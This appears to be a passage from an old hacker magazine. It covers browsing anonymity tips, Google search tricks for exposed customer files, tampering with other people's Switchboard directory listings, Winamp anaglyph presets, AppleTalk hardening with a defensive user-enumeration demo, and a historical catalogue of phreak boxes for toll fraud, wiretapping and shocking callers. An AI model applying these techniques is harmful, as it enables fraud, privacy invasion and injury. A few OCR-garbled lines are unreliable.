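        return "proxy detected, IP hidden", proxy_marks
    return "no proxy headers", []


if __name__ == "__main__":
    for label, request in (("transparent", TRANSPARENT), ("anonymous", ANONYMOUS),
                           ("no marks", NO_MARKS), ("forwarded", FORWARDED)):
        print(label, "->", check_proxy(request, REAL_IP))
```
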

Netscape users can add a proxy by going to
Edit/Preferences/Advanced/Proxy.

If you don't want to use a proxy server, try one
of the anonymity providing servers listed below.
These servers act as a proxy since web pages are
retrieved by them rather than by the person
actually browsing the web (you). Go to one of these
web sites and just type a URL you want to visit -
the server does the job for you, securing you from
many potential dangers.

Some of the Anonymity Providing
Servers Available

Servers with SSL Support
Anonymyth: http://www.anonymyth.com
Orangatango: http://www.orangatango.com/home/index.ns.html
Rewebber: http://www.rewebber.com and http://www.anon.de

Servers without SSL Support
Anonymouse: http://nonymouse.com
Anonymizer: http://www.anonymizer.com
SiegeSoft: http://www.siegesoft.com

Anonymyth uses 512-bit SSL encryption for all
HTTP data, which prevents your ISP from tracking
your Internet activities. The only traces that are left
from your browsing are in your browser history
list.

If you want to remain anonymous while sending
emails, you can use a remailer. This is a special
service that receives an email message from you,
then readdresses it, and sends it to the person you
want to send it to. During the process, any headers
that might point back to you are removed. Many
remailers are available on the Internet; some of
them let you put a fake return address, but most of
them directly state that the message is sent from an
anonymous source. One of these web-based
remailers can be found at
https://ssl.dizum.com/help/remailer.html. For a list
of remailers check http://security.tao.ca/email.shtml.

Other Useful Tips

You may want to clear out your browser's
history list. This is something that should be done
each time you're finished with your browsing if
you don't want someone to be able to easily see
where you've been surfing (if you share your
Windows workstation or server). To do this for Internet
Explorer 5.0:

Click the Tools menu bar.

Choose Internet Options.

On the General tab, click Clear History.

When it asks "Delete all items in your History
folder?" click OK.

Click the OK button at the bottom of the
Internet Options window.

Another place that your web trail is recorded is
the cache directory - a temporary storage area for
recently visited pages and images. The cache
allows for repeatedly visited Web sites to show up
more quickly when you reload them into your
browser. If you don't want people to read your
cache it should be deleted. Note, however, that on
slower machines with slow connections, this will
result in a noticeable decrease in the speed when
your computer brings up previously visited web
pages. To delete your cache on IE 5.0:

Choose Internet Options from IE's Tools menu.

Locate the Temporary Internet Files heading,
click the Delete Files button, and choose OK when
prompted.

Click the OK button at the bottom of the
Internet Options window.

Close and restart your browser.

Netscape users may go to the
Edit/Preferences/Navigator menu to delete the browser's
history list and to Edit/Preferences/Navigator/Cache
to clean up the browser's cache.

Balance Your Paranoia

This article isn't intended to frighten you. Just
remember that there isn't much privacy on the
Internet. So think carefully about which sites you
choose to visit, and think twice before you provide
any information about yourself.


Stupid Google Tricks 


by Particle Bored 

Google.com has long been the undisputed king
of search engines, yet few are aware of its power
as a hacking tool. I have discovered a few features
that are sure to provide hours of fun for the whole
family.

To waste a few seconds of your life you can
change the language via the Language Tools link
on the main page. It is possible to change the
language of the interface to anything from Bengali to
Telugu, but I prefer Elmer Fudd. Do not attempt to
use the Hacker language while under the influence
of caffeine, as you are likely to kick a hole in your
monitor.

One of the features that gets me quite aroused
is Google's ability to search files with a specific
DOS extension. This is done by submitting a query
in the following format:

search terms filetype:ext

where search terms are, uh, your search terms,
and ext is a typical DOS file extension. Searches of
xls and mdb files are great for finding things like
customer lists. You can even search text within vbs
and dll files. As far as I can tell there are no limits
as to the file type, so there is plenty of room for
creativity.

I'm sure all of you have visited a worthless
web site where you can't locate information even
if you use their search engine, like sun.com. Well,
let Google search their site for you. Using sun.com
as an example, simply use the format:

search terms site:sun.com

and you will probably find what you seek.
Another cool feature is the ability to search for
sites that link to a specific site. Not only can you
use this to discover who is linking to your web site,
but it is good for quickly finding all of an
international company's web sites. For sun.com I would
use the format:

search terms link:sun.com

Use only the domain name or you will restrict
the results.

As for restricting results, there are times you
will need to search only the title since searching all
of the text yields far too many hits. Searching titles
only can be done with this:

allintitle: search terms

I'm not sure why they changed the syntax on
this one. Note the space after the colon, too.


Google is great for working with phone
numbers as well. Searching on an area code and prefix
will quickly give you the location of an unknown
target since one of the hits is likely to contain an
address. But wait, Google can do reverse lookups,
too! Simply enter the area code and phone number
(in dashed format) as the query.

You may want to use this final trick quickly,
since I fear the functionality may disappear soon
after this article is published. Have you ever found
the perfect document, only to be denied access
because the .mil site where it resides doesn't like
your source IP? If you look within the query
results you will hopefully find links that say
"Cached" or "View as HTML". Follow the link
and you will be able to view Google's copy of the
document.



by Cunning Linguist
cunninglinguist@hushmail.com

Switchboard.com - it's the Yellow Pages. Electrified.
Switchboard.com is an online directory of
citizens nationwide. You can find friends, family, or
anyone listed with a name you know. In many
cases, you'll come up with more than one listing
for a specified name. One of the cool things about
Switchboard.com is the fact that if a person has all
of their information you might be able to find a lot
more information than you intended. On a search
for my name, I found one of me listed in my area
and found his complete address, all three of his
phone numbers, and all of his e-mail addresses.

Switchboard.com also provides hours of
entertainment for the bored teenager in his room with
nothing to do. Searching for one mister Hairy
Balls provides loads of laughs, as does searching
for Dick Paine and Harry Butts. But now, on to the
real stuff...

Like the Amazon.com mishap a while back,
where people could write comments about a book
as the author of that book, Switchboard.com
allows you to add or delete users listed without any
authentication whatsoever, except an e-mail
address. When I searched for my information, I
didn't find me, but I found my mother and father. I
opted to delete their listings from the database of
people, so I took the appropriate steps by clicking
on their names (which appear in bold text),
clicking the "Update Listing" link on the right-hand
menu, and clicking the button labeled "Remove
Listing". (You can also update the listing, also by
simply entering an e-mail address which no doubt
you'll throw away at Yahoo's expense.) After
entering an e-mail address I shan't use again, I
received a link in the confirmation mail which I was
instructed to click. After I complied I was directed
to a page that told me the listing was removed.

You can modify or delete any person's account.
I'm sure someone in Somewhere, USA won't be
too pleased if his family is looking for his phone
number online and dials Ms. Trixy's House of
Sexy Sexual Sex by mistake. Or if they can't find it
at all. Adding a listing is not a problem, either.
Here's one some fellow posted:
http://www.switchboard.com/bin/cginbr.dll?ID=500683995&MEM=1&FUNC=MORE&TYPE=1007.

In retrospect, I suppose you really can't use any
kind of security measure to ensure a random
person doesn't delete your listing. I mean, the listings
end up there one way or another; I know my father
didn't add his listing. He probably put his name
and address on a form somewhere, and whoosh, he
was in a national online directory.

Just thought I'd share this fun little story with 
you. 

Thanks to Chi for showing me the fun I can
have while bored and watching The Mummy
Returns all day every day. (And I'll see VeUr and
R etd Van re in school.)





by diabolik
diabolik@nitric.net

This article will explain how to take those
cheap "3D glasses" you get in cereal boxes and
comic books and use them with Winamp's AVS
studio to create very realistic 3D spectrum
analyzer effects and trip for days. It's pretty simple
and amazing. When it works, you can get effects
reaching about a foot to two feet out of your
screen toward you. Very trippy. The trick to
achieving a 3D effect from your monitor is a pair
of those old "3D glasses" you'd get as a kid to
turn red and blue lines into a shitty purple picture
that was sort of, but not quite, 3D.

Disclaimer: You can hurt your eyes doing
this. The day after I figured it out, I woke up with
a pretty bad headache. You can experience
anything from nausea to tiredness and just a plain bad
headache. If those "Magic Eye" things weren't
for you, don't attempt this. Use at your own risk -
it's not my fault. Don't blame me.

What You Will Need 

A computer. (Actually, although it's not that
intense graphically, you should have a pretty
good video card. The higher the frame rate, the
nicer this effect looks. More importantly, a low
resolution will force the spectrum analyzers to
cancel each other out more often and will result in
distorted pictures.)

A pair of 3D glasses. (These are the ones with
a piece of red cellophane on one eye and blue
cellophane on the other. The ones I'm using have red
over the left eye and blue over the right. If yours
aren't the same, wear them backwards or mod my
code.)

WinAMP with AVS Studio. (These are what I
wrote the "3D mod" presets in.) You'll want to be
fullscreening these effects at 640x480, although
yesterday I was ICQing while I had a portion of
my monitor displaying the AVS and the effect
was noticeable - it hurt a lot more, too.

Booming techno always helps. Aphex Twin,
Clint Mansell... whatever floats your boat.

How to Make the Presets 

You can download the presets from
http://d)nsinik7.hypermart.net/, but I strongly
suggest writing your own. The AVS presets I
wrote are simple spectrum analyzers, a blue
analyzer with a red analyzer offset to the right of the
blue. The more the two are offset, the closer to
your eyes they appear. In Winamp's AVS Studio,
the x and y coordinates of the screen begin at -1
and end at 1 no matter what the resolution is. In
order to make the analyzers appear to be bulging
out of the screen, the offset between the red and
blue analyzers (I'll just refer to this as the offset
from now on) must vary. A good value for the
offset I found was c*cos(2*y)+0.05 for vertical
scopes and c*cos(2*x)+0.05 for horizontal scopes,
where c is a value of from 0.05 to 0.2. (Note:
these values work well for a 14" monitor at about
two feet away. You may have to modify this range
in order to suit your setup.) Since the scopes are
offset horizontally, it is easier to see a vertical
scope in 3D because the two scopes will cancel
each other out less - this is where a higher
resolution comes into play. The higher the detail of the
scopes, the less one scope will overwrite its
companion's position, and the better looking the result.

To make a throbbing vertical scope, try the
following:

1. Open the AVS Studio. (Start the visualization
and double click in the window.) Make a new
preset.

2. Add a trans/fade (+ -> trans -> fadeout). Set
it to be fast enough; you can slow it later if you
like the effect. Personally I just click on "Main"
and check off "clear every frame" so the effect is
as clean as possible.

3. Add a Superscope (+ -> render ->
Superscope) with the following settings:

Init: n=40; t=0; tv=0.1; dt=1;

Per Frame: t=t*0.9+tv*0.1;

Per Point:
x=t+v*(pow(sin(i*3.14159),1)/2)+(0.05*cos(2*y));
y=i*2-1.0; x=x*1.5-0.09;

Check off "Waveform", "Center", and
"Lines". Although you can modify those as you
wish, that's just what I suggest. This will be the
blue scope. To accurately choose your color, see
"Calibrating Your Preset" below.

Click the "x2" button to copy this Superscope.
Modify this one to have the following settings:

Init: n=40; t=0; tv=0.1; dt=1;

On Beat: c=((rand(100)/100)*0.08)+0.07;

Per Frame: t=t*0.9+tv*0.1; c=c*.9;

Per Point:
x=t+v*(pow(sin(i*3.14159),1)/2)+(c*cos(2*y))+0.05;
y=i*2-1.0; x=x*1.5-0.09;

This is only slightly more complex than a flat
surfaced (in 3-space) scope. When the On Beat
function is run, the offset between the two scopes
is randomized between 0.07 and 0.15. Every
frame, the offset is reduced to 90 percent of its
previous value (the scope appears to shrink back
towards the screen). Although Winamp's beat
detection isn't that great, during good house music
or anything with good bass, you will definitely
"see" the effect. You can get another neat effect
by making two sets of scopes - one vertical, one
horizontal - and have them come out of the screen
On Beat random amounts, with or without decay.
To make a 3D horizontal scope, I use the
following settings for each scope:

Blue Scope:

Init: n=40; t=0; tv=0.1; dt=1;

Per Frame: t=t*0.9+tv*0.1;

Per Point: y=t+v*(pow(sin(i*3.14159),1)/2);

x=i*2-1.0+(0.03*cos(2*x));

y=y*1.5;

Red Scope:

Init: n=40; t=0; tv=0.1; dt=1;

On Bern: c-((mnd( I(Xp/JO0yd).O7)+0m: 

Per Frame: t=t*0.9+tv*0.1; c=c*.9; (this would
be to decay the scope back to the screen,
otherwise remove the latter equation)

Per Point: y=t+v*(pow(sin(i*3.14159),1)/2);

x=i*2-1.0+(c*cos(2*x))+0.05;
y=y*1.5;

Another interesting effect you could try would
be to change cos(2*x) to abs(cos(4*3.14159*x)).
This would make two 3D ripples in the analyzer.
Instead of just coming out once, it would come
out, go back in, out and in again.

What Can't I Do to the Presets?

I strongly recommend you make your own -
mine are just working guides. You probably can
do a lot better if you've ever made Winamp AVS
settings before - until this project I never tried.
However, don't think that you will throw some
crazy blur effect into the mix and it will be even
more trippy. For this effect to work, the blue pixel
must be immediately offset to the left of the red
pixel for your eyes to combine them into a single
3D point. I've found that to get the most effective 3D
effect, keep your presets clean. Whatever effects
you do attempt to add, keep in mind: if the red
and blue lines cross (this is a reference to a
vertical scope - in a horizontal scope, they will cross
all the time), you will lose the 3D effect
immediately.

It would be really interesting to get a
dot-plane working with this effect, but unfortunately
I've found that there are far too many dots at most
angles to not have one dot plane overlap a large
portion of the other. You could do this by writing
an AVS plugin in C++, but that is outside the
scope of this article.

What Can I Do with the Presets?

Noting the limitations above, you can have
some damn cool effects. The most noticeable
thing you can do is modify "c" in the formula
dynamically. WinAMP's AVS Studio contains the
ability to do "On Beat" modifications to your
variables.

Calibrating Your Preset 

To get the best 3D effect, you want the
brightest color of red that still appears dark to the eye
seeing through the blue cellophane, and vice
versa. To find the right shade of blue, double click
on the blue bar near the bottom-right of the
window. Put on your glasses. Close your right eye.
Choose a shade of blue that appears dark to your
left eye. You should now be looking at the
light-to-dark blue vertical gradient near the bottom
right of the color selector through the red
cellophane. Move the brightness selector upwards as
high as it goes while it still appears black, or near
black. This will make the color as noticeable as
possible to your right eye while still appearing as
nothing to your left eye. Click okay, and calibrate
the second "Render/Superscope" color by doing
the opposite of what you did for the first. If when
looking at the presets through the glasses you can
see what almost looks like shadows of the scopes
on the screen itself, try darkening the chosen
shades of blue and red.

Other Ideas with the Glasses 

Obviously, WinAMP AVS modules are just
one idea for these glasses. With basic VB skill,
one could write 3D wire framing modules or a
starfield generator in pseudo-3D. Of course,
you're limited to the color of purple, but
considering you've paid about a dollar or less for these
you shouldn't really complain. One suggestion
I've had from a friend was to make an hour-long
mix tape, export the whole thing to VHS and bring
the tape, 20 pairs of the glasses, and a lot of
booze/weed/cough syrup/whatever to a party and
have a nice massive trip.

Conclusion 

Well, when it works, it works well. If you
can't get your crazy ass preset to work on the first
try, attempt to simplify it. I've found it's a lot
easier to see two scopes than one, but three or
more need a warm up of simpler effects. Other
things you can try are shifting your head from
side to side - this helps you really see the effect,
I've found. If you have too many scopes (four
instead of two), try changing the distance or angle
you're viewing. Just experiment, half the fun's
just seeing what you can come up with. Then
again a good chunk of it is staying up til 4 am
coaxing some cough syrup listening to Aphex
Twin in headphones.

Greetz: HackCanada, argv, clox, the other
members of Priapism, Jaiden Knight, all my local
friends - you know who you are.





by Steven Kreuzer
skreuzer@mac.com

By most accounts, Apple clients and servers
make up a small portion of the types of systems on
any given network. However, Apple hardware and
software have carved out a niche in certain areas
such as design and multimedia along with the
educational field. AppleTalk networks do exist. It is
just that hackers and system administrators tend to
overlook them. In mixed environments, the
network managers tend to be highly proficient with
Unix or Windows NT but don't know, or care to
know, about how AppleTalk networks actually
work. They will take the minimum steps
necessary to ensure that Apple clients can connect to
network resources and once that is complete all is
well and good. However, this lack of
understanding can be used as a possible entry point into your
network. This article was written using a Power
Macintosh G4 running OS 9J.2 and a dual
processor Power Macintosh G4 running OS 9.1
and AppleShare IP 6.3.3. It will address potential
security holes and what you can do to harden both
the client and server side of an AppleTalk network.

We will start off by examining the client side
and one of the most common problems, which also
plagues other network protocols as well. Older
Macintosh clients connecting to servers will send
their password in clear text across the network. It
is also possible that the server will force the client
to send their password as clear text if it does not
support other authentication algorithms. (Windows
2000 with AppleTalk support will do this.)
This is one of the easiest problems to fix, and you
have two very good solutions at hand. The first is
to download an updated version of the AppleShare
client that is available at
http://www.apple.com/appleshareip/text/downloads.html.
The second solution is a little more complex. If you open
the AppleShare client in ResEdit and locate the
"FSMNT" resource you will see a sub-resource
labeled "ApShare Mounter". Open up that resource
and do a search in ASCII for "Cleartxt". Once
found, replace the "C" in "Cleartxt" with any other
letter. Once that is complete, do the same for the
"ApShare ExFS" in the "EXFS" resource. Once
that is complete, save your changes and move the
file back into the extensions folder on the client
machine. This will prevent the user from sending
their password in clear text.

Another problem is allowing users to save
their login name and password. This creates an
alias to the file server located in the "Servers"
folder in the System Folder. When the machine
boots up, it will mount all file servers listed in that
folder. This can become a problem if an attacker
has physical access to a client machine. It is
possible to modify the AppleShare client so that the
"Save my name and password" feature is disabled.
A patch for that is available at
http://homepage.mac.com/skreuzer.

The last problem I will address on the client
side is personal file sharing. Every Mac OS since
version 7.0 has the ability to allow the end user to
share his or her hard drive and allow remote
connections. Most of the time when a person enables
file sharing they don't assign a password to the
system owner, thus allowing remote logins with
full read and write privileges to the entire hard
drive. Or a person will share the entire hard drive
rather than make share points and give regular
users read and write privileges to the whole hard
drive, including the system folder. This will allow
an attacker access to vital system resources and
also exposes things like preference files which can
contain passwords used by different applications.
It would also be possible to install a trojan or virus
that will execute upon next startup by placing the
file in the "Startup Items" folder. An attacker with
malicious intent could erase certain parts of the
hard drive, or the entire hard drive. To prevent this
from occurring, you can remove the "File Sharing
Extension" from the extensions folder in the
system folder. This will remove the ability to start
personal file sharing.

Both AppleShare IP servers and Macintosh
workstations running personal file sharing store
usernames, passwords and group data in a file
called "Users and Groups Data File" which is
located in the preferences folder of the system
folder. The encryption algorithm is very simple
and it is possible to decode passwords stored in
this file. AppleShare IP does not allow you to
share the system folder, so unless an attacker had
physical access to the server or was able to
execute a trojan on the server side, you should not
have to worry about the trivial encoding scheme
used. macfspwd, the Unix utility to decode the
password, is available from
http://happiness.dhs.org/software/macfspwd/macfspwd.c.

The perceived simplicity of AppleShare IP
(ASIP) makes it appealing to novice
administrators who typically have little appreciation for
security. Out of the box, ASIP is very secure but
certain steps can be taken to harden the out of the
box configuration. One of the biggest drawbacks
of ASIP is its inability to keep access logs. (The
web and mail server do log activity, but file
sharing does not.) It is possible to get a list of users
currently connected to the server, the connection
method, and when they logged on, but this data is
not written to any file so once they log off, all this
information is lost.

ASIP makes the enumeration of valid user
names a trivial task due to the fact that security
was sacrificed for ease of use. When you use the
AppleShare client to log onto a server, the return
result from the server can be used to brute force
valid usernames. When an invalid username is
entered, the server responds with a
kOAMErrMemberObjectNotFound (error -29312) which
translates to "Unknown user, invalid password or
the Login is disabled...", but when a valid
username with an invalid password is sent, the server
responds with kOAMErrAuthenticationError
(error -29360) which translates to "Sorry, the
password you entered is incorrect..." With this it
would be possible to write a script to read in user
names from a file and mimic the login process and
parse the result to brute force enumerate valid
usernames. To protect yourself against this, make
sure that the server disables accounts after
multiple failed login attempts. With this feature and a
secure user password in place, brute forcing
becomes much more difficult, if not impossible. The
drawback is that ASIP only allows you to
configure the minimum characters in a password. You
are unable to force a user to mix numbers and
letters, and you are unable to "blacklist" certain
words like "password".
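
Why the two result codes matter and what lockout changes, as an added example (a simulation written for this page, not AppleShare IP code): the first login function answers the way the article reports, the second returns one code for every failure and counts failures per submitted name. The account store, user names and the threshold of three are assumptions.

```python
import hashlib
import hmac
import os

# Result codes named in the article, with the messages it quotes.
kOAMErrMemberObjectNotFound = -29312  # "Unknown user, invalid password or the Login is disabled"
kOAMErrAuthenticationError = -29360   # "Sorry, the password you entered is incorrect"
OK = 0


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


class UserStore:
    """Toy account database standing in for the server's user list."""

    def __init__(self, accounts):
        self._users = {}
        for name, password in accounts.items():
            salt = os.urandom(16)
            self._users[name] = (salt, _hash(password, salt))
        # Salt and hash used for names that do not exist, so both
        # paths do the same amount of work.
        self._dummy = (os.urandom(16), os.urandom(32))

    def check(self, name, password):
        """Return (user_exists, password_matches)."""
        exists = name in self._users
        salt, stored = self._users.get(name, self._dummy)
        matches = hmac.compare_digest(_hash(password, salt), stored)
        return exists, exists and matches


def login_as_described(store, name, password):
    """Behaviour the article reports: the code tells the two failures apart."""
    exists, matches = store.check(name, password)
    if not exists:
        return kOAMErrMemberObjectNotFound
    return OK if matches else kOAMErrAuthenticationError


class HardenedLogin:
    """One failure code for every failure, plus lockout per submitted name."""

    def __init__(self, store, max_failures=3):
        self.store = store
        self.max_failures = max_failures
        self.failures = {}  # counted for unknown names too, so lockout is no oracle

    def login(self, name, password):
        if self.failures.get(name, 0) >= self.max_failures:
            return kOAMErrMemberObjectNotFound  # "...or the Login is disabled"
        exists, matches = self.store.check(name, password)
        if exists and matches:
            self.failures.pop(name, None)
            return OK
        self.failures[name] = self.failures.get(name, 0) + 1
        return kOAMErrMemberObjectNotFound


def responses_differ(login, known="carol", unknown="nosuchuser"):
    """True if a wrong guess is answered differently for a real account."""
    return login(unknown, "wrong-guess") != login(known, "wrong-guess")


if __name__ == "__main__":
    store = UserStore({"carol": "correct horse 42"})  # constructed account
    print("as described:", responses_differ(lambda n, p: login_as_described(store, n, p)))
    print("hardened:    ", responses_differ(HardenedLogin(store).login))
```
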

The final topic I will address in this article is
related to user authentication. The algorithms for
all of the AppleShare authentication methods are
public. The most widely used authentication
method is 2 Way randnum that sends two 8 byte
DES encrypted random numbers over the
network. From a computational standpoint the
algorithm is exactly as strong as 56-bit DES and it has
a password length limit of eight characters. It is
vulnerable to an offline password guessing attack
similar to running crack against a Unix passwd
file. Apple has developed a new authentication
method that addresses the weaknesses of 2 Way
randnum, called DHX. DHX uses Diffie-Hellman
key exchange to create a 128-bit session key and
then sends a 64-character password to the server
encrypted with CAST 128. Its strength is
approximately equivalent to 128-bit SSL.

I have only scratched the surface of the
numerous potential vulnerabilities of AppleTalk
networks. In reality, on a well-configured AppleTalk
network, it can be incredibly difficult to bypass
security. But certain tools and techniques can
create access paths into your systems. I hope this
article has sparked an interest, and system
administrators will take a closer look at their
networks.



by Elf Qrin
(www.ElfQrin.com)

Traditionally in the phreaker culture, any
device thought to be connected to a phone line is
called a "box" and is named after a color since the
first "blue box" invented by Captain Crunch, the
father of the phreak scene. Since all colors were
quickly used for this purpose, other fanciful names
began to be used to name boxes.

I've tried to make a definitive list of all the
known "color boxes" with a brief description of
each.

I've done a lot of research to find and classify
them all, reading through about 300 documents. In
most cases I've used quotes from the original
documents for the descriptions.

Since most boxes were invented in the '80s or
early '90s, this article is mainly meant for
informative and historical purposes. Many of these
boxes don't work nowadays. (Some may never
have worked at all.) However, some still do. And
sometimes similar models can even be found in
stores.

I've catalogued 94 phreak boxes of 75
different kinds (counting only boxes with different
functions), and 17 aliases (same box with a
different name).

I've also included five non-phreak boxes of
four different kinds (boxes not meant to be
plugged into the phone line - they're meant for use
with the electric line or something else).

The raw total is 99 boxes of 79 kinds and 17
aliases, which adds up to 116 box names.

When the name of a box is included between
parentheses, the box name is actually just an alias
of another box.

When the name of a box is included between
square brackets, the box has been created or
reinvented by someone else using a different scheme
and/or different components.

When there's one box that uses the name of an
already existing box (supposedly because the
author was unaware of it), I've added to it a
sequential number between parentheses, such as (2), (3),
etc.




(2600 Box) (another name for the Blue Box).
See Blue Box.

Acrylic Box (aka Extended Bud Box). The
purpose of this box is to get Three-Way Calling,
Call Waiting, programmable Call Forwarding, and
an easier way of extended Bud Boxing, stealing
them from the fortunate ones on your block.
Created by The Pimp.

ALF Box. A tone generator for the Apple IIe
with an ALF Music Synthesizer Card. Created by
Sir Briggs of the SouthCentral Discount
Waremeisters (SCDW) of Texas.

Aqua Box. Every true phreaker lives in fear of
the dreaded FBI "Lock in Trace". For a long
time, it was impossible to escape from the lock in
trace. This box offers an "escape route" by
lowering the voltage on the phone line. Concept by
Captain Xerox. Plans by: The Traveler.

Assassin Box (sometimes misspelled as
Assasin Box, Asassin Box, Asasin Box). A box
designed to scare, harm, or kill people at the phone
by a shock of electricity right in the ear as soon as
the victim starts dialing a number. This box was
designed because its authors, after trying a
Day-Glo Box for some weeks, "were bored and decided
to move on to telephone terrorism." Invented by
Grim Reaper.

[Beagan Box] (sometimes misspelled as
Began Box) [similar to Beige Box, Beige Box
Revisited, Day-Glo Box]. See Beige Box. Concept and
Design: Black Box. Beta Testing: Lord Reagan.

Beige Box [similar to Beagan Box, Beige Box
Revisited, Bud Box, Day-Glo Box]. A homemade
lineman's handset, also known as REMOBS
(REMote OBserving Systems). With a Beige Box you
can do the following things: "Eavesdropping; long
distance, static-free free fone calls to phriends;
dialing direct to Alliance Conferencing (also
static-free); phuking up people; bothering the operator at
little risk to yourself; blue boxing with a greatly
reduced chance of getting caught; anything at all
that you want, since you are an extension on that
line." Invented by The Exterminator and The
Terminal Man. Date: Friday, May 17, 1985.

[Beige Box Revisited] [similar to Beagan Box,
Beige Box, Day-Glo Box]. See Beige Box. By
Mercenary. Year: 1992 or later.

Black Box. A Black Box is a device that is hooked up to your fone that fixes it so that when you get a call, the caller doesn't get charged for the call. This is good for calls up to a half hour. After that the fone company gets suspicious, and then you can guess what happens. The original box was created in the USA. There are modified versions for other countries. Original author unknown. UK Black Box by K.S. Reach of The Hackers Academy (March 1988). Greek Black Box by Fabulist and Enigma (year 1992).

Blast Box. All a Blast Box is is a really cheap amplifier (around five watts or so) connected in place of the microphone on your telephone, meant to talk to someone on the phone who just doesn't shut up.

Blast Box II. Similar to the Blast Box, but designed to blow up other people's computers, instead of their ears.

Bleeper Box [UK version of the Blue Box]. The United Kingdom's own version of the Blue Box, modified to work with the UK's phone system. Based on the same principles. However, British Telecom uses two sets of frequencies, forward and backward.

Blotto Box. For years now every pirate has dreamed of the Blotto Box. It was at first made as a joke to mock more ignorant people into thinking that the function of it actually was possible. This box, quite simply, can turn off the phone lines everywhere. Originally conceived by King Blotto. Created by The Traveler.

Blue Box (aka 2600 Box). The mother of all boxes. The first box in history which started the whole phreaking scene. Invented by John Draper (aka "Captain Crunch") in the early 60's, who discovered that by sending a tone of 2600Hz over the telephone lines of AT&T, it was possible to make free calls. In the 1960's, the makers of Cap'n Crunch breakfast cereal offered a toy-whistle prize in every box as a treat for the Cap'n Crunch set. Somehow John Draper (who called himself "Captain Crunch" since then) discovered that the toy whistle just happened to produce a perfect 2600-cycle tone. Discovered by Captain Crunch (John Draper). Year: early 1960's.

(Blue Con Box) (short name for the Blue Conference Box). See Blue Conference Box.

Blue Conference Box (aka Blue Con Box). A Blue Box and a Con Box combined.

Bottle-Nosed Gray Box [selective version of the Rainbow Box]. This box will do damage to only your phone, the line between you and your enemy, and your enemy's modem, whereas the Rainbow Box just takes everything out. By The Dolphin that came from Belmont.

[Brown Box] (aka Opaque Box) [similar to Con Box, Party Box, Three Box]. Created by The Doc.

Bud Box. This box is quite similar to a Beige Box, except this is a portable unit. It is extremely handy for free voice calls and tapping a nearby house's line. Invented by Dr. D-Code and The Pimp of The Slaughtered Chicken.

Busy Box. This box is attached to the outside of the person's house in their telephone box. It makes it so that when any phone inside that house is picked up, no dial tone is heard and no calls can be received or sent. This is good for lame BBS's as they tend not to call out much, and it will remain undetected for a longer period of time. Invented by Black Death.

Charging Box (aka Light Box). This box is used to indicate when a call is being charged for and when it is not. Once installed, the box has two lights, a green one and a red one. Green means free and red shows that you are being charged. Created by Stinky Pig Productions (a LI team).

(Chart Box) (short name for the Chartreuse Box). See Chartreuse Box.

Chartreuse Box (aka Chart Box, Obnoxious Box). Your telephone line is a constant power source. This box is designed to allow you to tap that power source and give you up to 12 volts (more if you use a transformer). Created by Wonko The Sane.

Cheese Box. This box (named for the type of box the first one was found in) turns your home phone into a pay phone. It can be used together with a Red Box to make free calls. Created by Otho Radix (?).

Chrome Box. A portable self-contained device to manipulate traffic signals. Not a phreak box. Created by Remote Control. Date: June 14 1988.

Clear Box. This box works on "post-pay" pay phones (a kind of payphone that could be found in Canada and in rural United States). In other words, those phones that don't require payment until after the connection has been established. If you don't deposit money, you can't speak to the person at the other end, because your mouthpiece is cut off - but not your earpiece. (Yes, you can make free calls to the weather, etc. from such phones.) With this box the user is able to speak to the other person for free. The clear box thus "clears" up the problem of not being heard. Author: Mr. French of 2600. Originally published in the July 1984 issue of 2600.

Cold Box. Usage unknown. Cited in the Blotto Box document. Created by The Traveler.

Con Box (aka Conference Box) [similar to Brown Box, Party Box, Three Box]. This box allows you to connect two lines in your house to give Three-Way type service, creating a party line.

(Conference Box) (expanded name for the Con Box). See Con Box.

Copper Box. Uses cross-talk feedback to try to damage sensitive equipment of a phone company. More a method than a real box. Conceived by The Cypher. Year: 1986.

Crimson Box (sometimes misspelled as Chrirmon Box) [similar to Green Box (2), Orange Box, Hold Box, Hold On Box, White Box (2), Yellow Box (2)]. This box is a very simple device that will allow you to put someone on hold or make your phone busy with a large amount of ease. You flip a switch and the person can't hear you talking. Flip it back and everything is peachy. It doesn't have a LED to show when hold mode is on. Created by Dr. D-Code. Year: 1985.

Dark Box. Multi-Purpose Network Manipulation Unit. This box's basic design allows you to call anywhere on earth without fear of being billed or traced. Created by Cablecast Operator of the Dark Side Research Group. Year: 1987.

[Day-Glo Box] (aka Dayglo Box) [similar to Beige Box]. This box lets you place calls for free with no time limit, no possibility of a wiretap, and the calls can be placed from anywhere in the world. Conceptualized by John F. Kennedy.

Diverti Box. Cited in the Blotto Box document. Probably used to divert a phone call. Created by The Traveler.

DLOC Box. Call Receive on two lines with the option to conference them. By The Dark Lords of Chaos: Prowler, Apprentice, Pro Hack, Zeus, Tarkmelh, Blacksioke, Lazer. Date: October 3 1988.

DMA Box. Not actually a box but a project of the Outlaw Telecommandos to hack cellular phones in the early era of those devices (1989). Issued in February 1989.

(Extended Bud Box) (another name for the Acrylic Box). See Acrylic Box.

Fuzz Box. This box duplicates the tones of coins dropping down the phone chute, thereby allowing the user to place calls without paying for them.

Gold Box [similar to X-Gold Box]. When you put a gold box on two phone lines it lets anyone who calls one of the lines call out on the other. So when the phone company traces the line it will tell them that you're calling from the line you hooked the gold box up to. By Dr. Revenge, cosysop of Modem Madness (5 lb).

Grab Box. This box uses inductive coupling to join with any radio that uses a coil for an antenna (such as an AM, longwave, or shortwave radio) and allows you to lengthen it considerably. Not a phreak box. This kind of box can be commonly found in an electronic shop. By Shadowspawn.

Green Box. This box generates tones for Coin Collect, Coin Return, and Ringback. It must be used by the CALLED party.

[Green Box (2)] [similar to Crimson Box, Orange Box, Hold Box, Hold On Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

(Gray Box) (another name for the Silver Box). See Silver Box.

[Hold Box] [similar to Crimson Box, Green Box (2), Orange Box, Hold On Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

[Hold On Box] [similar to Crimson Box, Green Box (2), Orange Box, Hold Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

Infinity Box (sometimes misspelled as Infiity Box). When the phone number of a telephone containing an infinity box device is dialed and a certain note is blown into the phone from a Hohner Key of C harmonica, the bugged phone does not ring and, what's more, enables the caller to then hear everything said in the room that the phone is located in. As long as the caller wants to stay on the phone, all is open to him or her. If the phone is lifted off the hook, the transmitter is disconnected and the "bugged" party receives a dial tone as if nothing was wrong with the line. Description by Iron Man of The Crack Shop. From the original "Infinity Transmitter" by Manny Mittleman.

